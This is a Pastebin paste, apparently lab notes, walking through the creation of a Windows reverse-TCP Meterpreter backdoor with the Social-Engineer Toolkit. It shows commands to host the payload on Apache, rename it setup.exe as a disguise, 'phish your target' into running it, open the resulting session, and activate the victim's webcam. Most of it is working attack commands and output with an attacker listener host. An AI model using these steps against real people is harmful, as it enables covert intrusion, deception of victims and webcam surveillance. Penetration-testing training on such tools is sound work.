Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Target = Windows 7 = 172.16.254.247
- Attacker = KALI = 172.16.254.144
- #############################################################################
- 1) Preparation of Backdoor
- a) to prepare a backdoor that doesnt get detected by AntiVirus
- b) to make the target click on the malicious program to run
- 2) Prepare a webserver with fake download page
- ## starting web server
- root@kali:~# /etc/init.d/apache2 start
- [ ok ] Starting apache2 (via systemctl): apache2.service.
- root@kali:~#
- ### making a folder downloadable for the malware
- mkdir /var/www/html/malware
- open firefox and test it with http://localhost/malware
- step 3) prepare the backdoor
- setoolkit
- press Y agree
- Please update SET to the latest before submitting any git issues.
- Select from the menu:
- 1) Social-Engineering Attacks
- 2) Penetration Testing (Fast-Track)
- 3) Third Party Modules
- 4) Update the Social-Engineer Toolkit
- 5) Update SET configuration
- 6) Help, Credits, and About
- 99) Exit the Social-Engineer Toolkit
- press 1 > 4
- select 2
- 2) Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker
- set:payloads> IP address for the payload listener (LHOST):
- for LHOST use your IP 172.16.254.144
- set Listener to 8888
- set:payloads> Enter the PORT for the reverse listener:8888
- set:payloads> Do you want to start the payload and listener now? (yes/no):
- answer yes
- malware is located under
- [*] Payload has been exported to the default SET directory located under: /root/.set//payload.exe
- 3) Move the malware from the default set directory to malware directory of apache2
- # to move the payload (backdoor ) into the apache2 malware directory
- root@kali:~# mv /root/.set/payload.exe /var/www/html/malware/
- #rename the payload.exe as setup.exe
- root@kali:~# mv /var/www/html/malware/payload.exe /var/www/html/malware/setup.exe
- 4) make sure the setoolkit terminal is still running
- phish your target to download the file
- once the setup.exe is already run.. you will notice a session on metasploit handler
- sessions -i @## to view the list of sessions established
- msf exploit(handler) > sessions -i
- Active sessions
- ===============
- Id Type Information Connection
- -- ---- ----------- ----------
- 1 meterpreter x86/windows WIN-4RS5II4B5T0\Reverse @ WIN-4RS5II4B5T0 172.16.254.144:8888 -> 172.16.254.247:49195 (172.16.254.247)
- msf exploit(handler) > sessions -i 1 ## to establish connection with id 1
- run webcam
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement